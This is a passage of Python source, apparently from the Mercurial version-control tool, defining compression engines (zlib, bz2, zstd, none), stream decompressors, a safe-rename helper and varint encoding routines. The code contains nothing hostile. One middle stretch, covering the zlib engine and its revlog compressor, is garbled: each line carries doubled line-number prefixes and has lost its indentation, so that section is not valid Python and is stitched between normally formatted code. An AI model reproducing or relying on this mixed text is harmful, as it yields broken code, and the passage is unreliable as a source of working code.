        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
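        # zlib exposes no explicit end-of-stream flag, so probe a copy of the
        # decompressor with a sentinel byte: if the sentinel comes back in
        # unused_data, the compressed stream has already ended.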
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
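        # The '_truncatedBZ' bundle format strips the leading 'BZ' magic from
        # the stream, so re-inject it before decompressing the payload.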
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
3567 3568 """
3568 3569 return 'gzip', 'GZ'
3569 3570
3570 3571 def wireprotosupport(self):
3571 3572 return compewireprotosupport('zlib', 20, 20)
3572 3573
3573 3574 def revlogheader(self):
3574 3575 return 'x'
3575 3576
3576 3577 def compressstream(self, it, opts=None):
3577 3578 opts = opts or {}
3578 3579
3579 3580 z = zlib.compressobj(opts.get('level', -1))
3580 3581 for chunk in it:
3581 3582 data = z.compress(chunk)
3582 3583 # Not all calls to compress emit data. It is cheaper to inspect
3583 3584 # here than to feed empty chunks through generator.
3584 3585 if data:
3585 3586 yield data
3586 3587
3587 3588 yield z.flush()
3588 3589
3589 3590 def decompressorreader(self, fh):
3590 3591 return _GzipCompressedStreamReader(fh)
3591 3592
3592 3593 class zlibrevlogcompressor(object):
3593 3594 def compress(self, data):
3594 3595 insize = len(data)
3595 3596 # Caller handles empty input case.
3596 3597 assert insize > 0
3597 3598
3598 3599 if insize < 44:
3599 3600 return None
3600 3601
3601 3602 elif insize <= 1000000:
3602 3603 compressed = zlib.compress(data)
3603 3604 if len(compressed) < insize:
3604 3605 return compressed
3605 3606 return None
3606 3607
3607 3608 # zlib makes an internal copy of the input buffer, doubling
3608 3609 # memory usage for large inputs. So do streaming compression
3609 3610 # on large inputs.
3610 3611 else:
3611 3612 z = zlib.compressobj()
3612 3613 parts = []
3613 3614 pos = 0
3614 3615 while pos < insize:
3615 3616 pos2 = pos + 2**20
3616 3617 parts.append(z.compress(data[pos:pos2]))
3617 3618 pos = pos2
3618 3619 parts.append(z.flush())
3619 3620
3620 3621 if sum(map(len, parts)) < insize:
3621 3622 return ''.join(parts)
3622 3623 return None
3623 3624
3624 3625 def decompress(self, data):
3625 3626 try:
3626 3627 return zlib.decompress(data)
3627 3628 except zlib.error as e:
3628 3629 raise error.StorageError(_('revlog decompress error: %s') %
3629 3630 stringutil.forcebytestr(e))
3630 3631
3631 3632 def revlogcompressor(self, opts=None):
3632 3633 return self.zlibrevlogcompressor()
3633 3634
3634 3635 compengines.register(_zlibengine())
3635 3636
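# Example (illustrative sketch): using a revlog compressor directly. Note
# that compress() may return None when compression is not worthwhile, and
# that the revlog itself is responsible for routing on the revlogheader()
# byte.
#
#   compressor = compengines['zlib'].revlogcompressor()
#   data = 'some revision data' * 100
#   compressed = compressor.compress(data)
#   if compressed is not None:
#       assert compressor.decompress(compressed) == data
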
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't advertise
    # them by default because, unless you are on a fast network, uncompressed
    # payloads can easily saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

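# Example (illustrative sketch): the zstd engine is optional (it depends on a
# bundled C extension), so check availability before selecting it by name.
#
#   if 'zstd' in compengines and compengines['zstd'].available():
#       engine = compengines['zstd']
#   else:
#       engine = compengines['zlib']
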
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

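# Worked example for safename(): with f='foo' and tag='resolved', the first
# candidate is 'foo~resolved'; if the context already contains that name, the
# counter kicks in and 'foo~resolved~1', 'foo~resolved~2', ... are tried.
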
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

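# Worked example for the '\xb9\n' doctest above: 1337 = 0b10100111001. The
# low 7 bits are 0b0111001 = 0x39; OR-ing in the continuation bit gives 0xb9.
# The remaining bits are 1337 >> 7 = 10 = 0x0a ('\n'), emitted last with the
# high bit clear to mark the end of the varint.
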
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7